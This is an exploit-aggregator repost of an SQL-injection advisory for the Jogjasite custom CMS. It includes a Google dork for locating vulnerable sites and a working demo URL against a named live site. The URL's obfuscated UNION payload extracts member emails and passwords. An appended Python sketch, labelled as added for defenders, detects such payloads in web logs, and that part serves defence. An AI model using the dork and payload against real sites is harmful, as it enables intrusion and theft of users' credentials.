Custom CMS Jogjasite - SQL-Injection Vulnerability

CVE: N/A
Category: CWE-89
Price: N/A
Severity: High
Author: N/A
Risk: High
Exploitation Type: Remote
Date: 2021-02-05
CPE: cpe:cpe:/a:jogjasite:custom-cms
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.7456
EPSSP: 0.94275

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021020015

Below is a copy:

Custom CMS Jogjasite - SQL-Injection Vulnerability
#############################################################
# Exploit Title: Custom CMS Jogjasite - SQL-Injection Vulnerability
# Exploit Author: Gh05t666nero
# Author Team: IndoGhostSec
# Google Dork: intext:"By jogjasite.com"
# Software Vendor: jogjasite.com
# Software Version: *
# Software Link: N/A
# Tested on: Linux gh05t666nero 5.10.0-kali2-686-pae #1 SMP Debian 5.10.9-1kali1 (2021-01-22) i686 GNU/Linux
# Date: 2021-02-05

#############################################################
[*] Information:

Jogjasite is a custom website creation service, offering web design and web programming services according to your wishes and needs. However, they program the sites so poorly that some vulnerabilities are left behind.

#############################################################
[*] Exploit:

-

#############################################################
[*] Demo:

https://sonjucomputerjogja.com/kategori-12'+AND+0+UNION+SELECT+1,2,3,(/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(memberarea)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,email,0x203a3a20,password,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+--accessories


#############################################################
[*] Contact:

# Instagram: instagram.com/ojan_.py
# Telegram : t.me/Gh05t666nero
# Twitter: twitter.com/Gh05t666nero1
# Blogger: anonsec.my.id
# E-mail : [email protected]
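
Added example for defenders, not part of the original advisory or of the vendor's code: the demo request hides its keywords inside MySQL versioned comments (/*!50000SELECT*/), so this sketch unwraps those comments before matching and checks the path against a strict route pattern. The route shape /kategori-<id>-<slug>, the signal names, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: category route is /kategori-<numeric id>-<slug>, inferred from the demo URL.
ROUTE = re.compile(r"^/kategori-(\d+)(?:-[a-z0-9-]+)?$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # MySQL executes the body of /*!50000...*/
COMMENT = re.compile(r"/\*.*?\*/", re.S)          # ordinary comments are ignored by MySQL

SIGNALS = {  # hypothetical signal names, matched on the normalized path
    "union_select": re.compile(r"\bunion\b\s*(all\s*)?\(?\s*select\b"),
    "user_var_assign": re.compile(r"@\w+\s*:="),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),
    "trailing_comment": re.compile(r"--(\s|$)"),
    "quote_in_path": re.compile(r"['\"]"),
}

def normalize(path):
    """Decode the path and unwrap comments so it reads the way MySQL would parse it."""
    text = unquote_plus(path)             # %xx and '+' -> characters / spaces
    text = VERSIONED.sub(r" \1 ", text)   # keep the keyword hidden in a versioned comment
    text = COMMENT.sub(" ", text)         # drop plain comments used as separators
    return re.sub(r"\s+", " ", text).lower()

def triage(log_line):
    """Return (path, route_ok, sorted signal names), or None if no request is found."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    path = m.group(1)
    text = normalize(path)
    hits = sorted(name for name, rx in SIGNALS.items() if rx.search(text))
    return path, bool(ROUTE.match(path)), hits

# Constructed sample log lines (documentation addresses; not taken from the page).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Feb/2021:10:00:01 +0700] '
    '"GET /kategori-12-accessories HTTP/1.1" 200 5123',
    '203.0.113.9 - - [05/Feb/2021:10:00:09 +0700] '
    '"GET /kategori-12\'+AND+0+UNION+/*!50000SELECT*/+1,2,3--+-x HTTP/1.1" 200 911',
    '203.0.113.9 - - [05/Feb/2021:10:00:12 +0700] '
    '"GET /kategori-12%27%20and%20(@x:=0x00) HTTP/1.1" 200 5100',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(triage(line))
```

A request that fails the route check should be rejected before it reaches the database layer; the signal list is for log triage and does not replace parameterized queries in the application.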

Copyright ©2024 Exploitalert.
